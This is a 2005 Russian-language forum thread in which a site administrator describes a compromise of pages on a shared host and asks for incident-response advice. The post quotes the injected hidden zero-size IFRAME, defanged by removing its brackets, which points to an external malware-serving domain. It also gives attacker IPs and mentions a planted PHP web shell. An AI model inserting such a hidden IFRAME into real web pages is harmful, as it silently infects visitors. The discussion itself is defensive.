Название: Хюлюганы Отправлено: Dimon от 20 Мая 2005, 01:02:34 Скажем так. Есть пример с такой ситуацией.
На серверах V*host есть несколько разных доменов с разным контентом (стандартная услуга почти всех хостеров). В титульные и некоторые другие html-страницы всех этих сайтов этих доменов были внесены следующие записи: IFRAME SRC="http://www.crazy-toolbar.com/home/Ch0ke7/" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME (первый и последний теги < и > убраны мной специально). Понятно, что когда пользователь попадет на такую страницу, на его компьютер, извините, начает валиться много всякого д***ма. Также подменяется файл explorer.exe и т.п., и т.д. Реально много. Я даже не сразу все вычистил. При ознакомлении с логами. Подозрение падает на этот IP 63.148.99.234 domain.biz - [19/May/2005:19:16:58 +0400] "GET / HTTP/1.1" 200 5207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" Но в то же время, складывается впечатление, что люди просто напрямую знали пароль. (Вообще, ощущение такое, что строка добавлялась чуть ли не полуавтоматически, так как в разных местах разных html-страниц). Интересны мнения. А также это очередная лажа хостера или поломали чего? Название: Re:Хюлюганы Отправлено: Dmitry от 20 Мая 2005, 09:02:40 Ну, при попытке загрузить указанную вами страничку, антивирус верещит как резанный, находя несколько exploit'ов, использующих уязвимость в MS Java VM, пропатченную больше года назад, если верить описаниям. Допускаю, что могут быть и новые варианты старой заразы - не исследовал. А уж как они туда попали, черт его знает - может и поломали чего-то, может сами владельцы, может с умылом, а может быть и по халатности...
Название: Re:Хюлюганы Отправлено: Dimon от 20 Мая 2005, 10:14:55 Dmitry, на данный момент выяснено, как попало. На сервер каким-то образом был занесен php-файл (если нужно перешлю код приватом; также как и логи, и пр. доп. инфу). Далее все действия злоумышленниками осуществлялись через него, включая автоматическую подмену страниц и пр.
По логам виднеются два IP. Один уже понятно чей. Второй выдает 209.66.120.12 US UNITED STATES - - ABOVENET COMMUNICATIONS INC По нему бы хотелось больших подробностей. По первому IP - он оказался IP одной из известных телеком-компаний. Соответственно, интересно, как правильно действовать раньше. Я им уже написал с просьбой зафиксировать логи и другими вопросами, etc. Но хотелось бы увидетть грамотные рекомендации и советы, что делать и как делать дальше. Название: Re:Хюлюганы Отправлено: Dmitry от 20 Мая 2005, 10:28:02 http://www.leader.ru/secure/whoiz.html?q=209.66.120.12 (http://www.leader.ru/secure/whoiz.html?q=209.66.120.12)
|